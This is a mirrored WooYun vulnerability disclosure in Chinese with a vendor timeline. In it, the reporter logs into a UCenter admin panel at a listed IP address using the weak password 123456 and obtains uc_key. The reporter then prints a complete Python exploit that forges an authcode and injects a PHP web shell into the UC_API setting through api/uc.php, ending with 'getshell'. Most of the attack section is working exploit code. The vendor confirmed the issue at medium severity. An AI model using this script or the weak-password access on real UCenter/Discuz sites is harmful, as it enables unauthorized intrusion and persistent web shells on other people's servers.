乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-22: 细节已通知厂商并且等待厂商处理中 2016-04-22: 厂商已经确认,细节仅向厂商公开 2016-05-02: 细节向核心白帽子及相关领域专家公开 2016-05-12: 细节向普通白帽子公开 2016-05-22: 细节向实习白帽子公开 2016-06-06: 细节向公众公开
讲道理宝宝不服(。•ˇ‸ˇ•。) http://wooyun.org/bugs/wooyun-2016-0198952提权外连都只给5rank不跟你玩了(╯°□°)╯︵ ┻━┻
http://180.153.190.79:8880/uc_server/admin.php?
啦啦 点进去 默认账户 试下弱口令123456不小心进去了
点进应用管理
uc_key是用来加密用户传参的用脚本构造一下
#! /usr/bin/env python# coding=utf-8import hashlibimport timeimport mathimport base64import urllibimport urllib2import sysdef microtime(get_as_float=False): if get_as_float: return time.time() else: return '%.8f %d' % math.modf(time.time())def get_authcode(string, key=''): ckey_length = 4 key = hashlib.md5(key).hexdigest() keya = hashlib.md5(key[0:16]).hexdigest() keyb = hashlib.md5(key[16:32]).hexdigest() keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:] #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:] cryptkey = keya + hashlib.md5(keya + keyc).hexdigest() key_length = len(cryptkey) string = '0000000000' + \ (hashlib.md5(string + keyb)).hexdigest()[0:16] + string string_length = len(string) result = '' box = range(0, 256) rndkey = dict() for i in range(0, 256): rndkey[i] = ord(cryptkey[i % key_length]) j = 0 for i in range(0, 256): j = (j + box[i] + rndkey[i]) % 256 tmp = box[i] box[i] = box[j] box[j] = tmp a = 0 j = 0 for i in range(0, string_length): a = (a + 1) % 256 j = (j + box[a]) % 256 tmp = box[a] box[a] = box[j] box[j] = tmp result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) return keyc + base64.b64encode(result).replace('=', '')def get_shell(url, key, host): ''' 发送命令获取webshell ''' headers = {'Accept-Language': 'zh-cn', 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)', 'Referer': url } tm = time.time() + 10 * 3600 tm = "time=%d&action=updateapps" % tm code = urllib.quote(get_authcode(tm, key)) url = url + "?code=" + code data1 = '''<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://xxx\');一句话//</item> </root>''' try: req = urllib2.Request(url, data=data1, headers=headers) ret = urllib2.urlopen(req) except: return "访问出错" data2 = '''<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://aaa</item> </root>''' try: req = urllib2.Request(url, data=data2, headers=headers) ret = urllib2.urlopen(req) except: return "error" return "webshell:"if __name__ == '__main__': host = '123.123.123.123' key = 'uckey' url = host + "/api/uc.php" print get_shell(url, key, host)
成功getshell
啦啦 点进去 默认账户 试下弱口令123456不小心进去了点进应用管理
uc_key是用来加密用户传参的用脚本构造一下成功getshell
随便你吧口亨(╯°□°)╯︵ ┻━┻
危害等级:中
漏洞Rank:5
确认时间:2016-04-22 16:50
谢谢白帽子可爱多,(*^__^*) 嘻嘻……
暂无